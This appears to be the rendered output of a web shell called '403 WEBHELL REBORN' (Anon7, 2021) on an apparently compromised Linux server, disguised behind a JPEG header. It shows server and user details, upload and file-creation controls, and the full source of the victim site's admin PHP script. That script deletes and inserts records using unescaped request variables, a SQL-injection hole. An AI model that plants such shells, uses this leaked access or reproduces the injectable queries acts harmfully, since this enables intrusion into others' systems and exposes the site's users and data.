ÿØÿà JFIF  ` ` ÿþš 403 WEBHELL REBORN
403 WEBHELL REBORN
Server : Apache
System : Linux ruga7-004.fmcity.com 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : tkt_travelbus ( 1137)
PHP Version : 7.0.0p1
Disable Function : mysql_pconnect
Directory :  /tkt_travelbus/www/admin/intra/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

Buat Folder Baru:
Buat File Baru:

Current File : /tkt_travelbus/www/admin/intra/pca_account_event_choice_proc.php
<?
	include "../include/top_proc.html"; //공통파일 인클루드
	include "_common.php";

	deanLog("process_mode", $process_mode, "k1");
	//deanLog("mb_id", $mb_id, "k1");
	//deanLog("pca_event_code", $pca_event_code, "k1");

	switch ($process_mode) {
		case 'event_choice_mode':
			$sql = "delete from TB_PCA_ACCOUNT_MEMBER where mb_id = '{$mb_id}'";
			db_query($sql);

			foreach ($pca_event_code as $value) {
				$temp_array = explode("|||", $value);
				//deanLog("temp_array", $temp_array, "k1");
				$account_number = $temp_array[0];
				$flag_inout = $temp_array[1];

				$sql = "insert into TB_PCA_ACCOUNT_MEMBER (account_number, flag_inout, mb_id, register_datetime) values ('{$account_number}', '{$flag_inout}', '{$mb_id}', now())";
				//deanLog("sql", $sql, "k1");
				db_query($sql);
			}

			error_msg("parent.document.location.reload();","script");
			break;
	}
?>

Anon7 - 2021